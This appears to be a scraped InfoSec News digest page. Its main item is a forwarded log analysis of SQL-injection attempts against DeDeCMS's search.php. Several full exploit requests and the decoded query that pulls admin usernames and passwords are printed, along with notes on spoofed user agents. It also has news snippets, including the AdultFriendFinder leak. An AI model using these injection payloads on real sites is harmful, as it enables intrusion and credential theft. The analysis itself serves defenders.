Information Security News
Posted by InfoSec News on May 22http://www.zdnet.com/article/a-practical-history-of-plane-hacking-beyond-the-hype-and-hysteria/
Posted by InfoSec News on May 22Forwarded from: bluknight <bluknight () skytalks info>
Typically we try to device attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistance) to more advanced state sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).
So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS">The attack:
GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 - Python-urllib/2.7
DeDeCMSis a Drupal like content management system popular in China . Exploits like the one above have been used at least since 2013 . The site that was attacked above does not use DeDeCMS, so the attacker did not do any recognizance.
The attacker also doesnt bother modifying the user agent and keep the Python-urllib/2.7 user agent indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.
The SQL statement that is being attempted:
SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/**/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1
A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.
Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some recognizance:
GET / HTTP/1.1 301 178 - +http://www.google.com/bot.html)
Here they spoof the Google user agent. The even first try out the plus/search.php URL:
GET //plus/search.php?keyword=astypeArr[111%3D@`\x5C`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C`+]=a HTTP/1.1 404 9093 - +http://www.google.com/bot.html)
But even though it returns a 404, they still proceed with the attack.
Posted by InfoSec News on May 22http://arstechnica.com/security/2015/05/flawed-android-factory-reset-leaves-crypto-and-login-keys-ripe-for-picking/
Infosec practitioners face host of challenges
Boshoff says infosec improvements are being hindered by a lack of buy-in and support from business. "It is very difficult for security practitioners to successfully implement security protocols within an organisation when they have resistance from the ...
E-mail addresses, sexual orientations, and other sensitive details from almost four million AdultFriendFinder.com subscribers have been leaked onto the Internet following a hack that rooted the casual dating service, security researchers said.
The cache includes more than 3.8 million unique e-mail addresses of current and former subscribers, Australian security researcher Troy Hunt reported early Friday morning. The data, which is in the form of 15 Microsoft Excel spreadsheets, was first seeded to anonymous sites hosted on the Tor privacy network. It has since spread to sites on the open Internet. Links to sites hosting the data are easily found on Twitter and other social networking sites, (Ars isn't publishing the locations).
The compromise was first reported by British broadcaster Channel 4. In addition to including e-mail addresses and the sexual orientations of users, the data also provided other sensitive information, such as ages, zip codes, and whether the subscriber was seeking an extramarital affair. The trove included information for deleted accounts as well as those still current.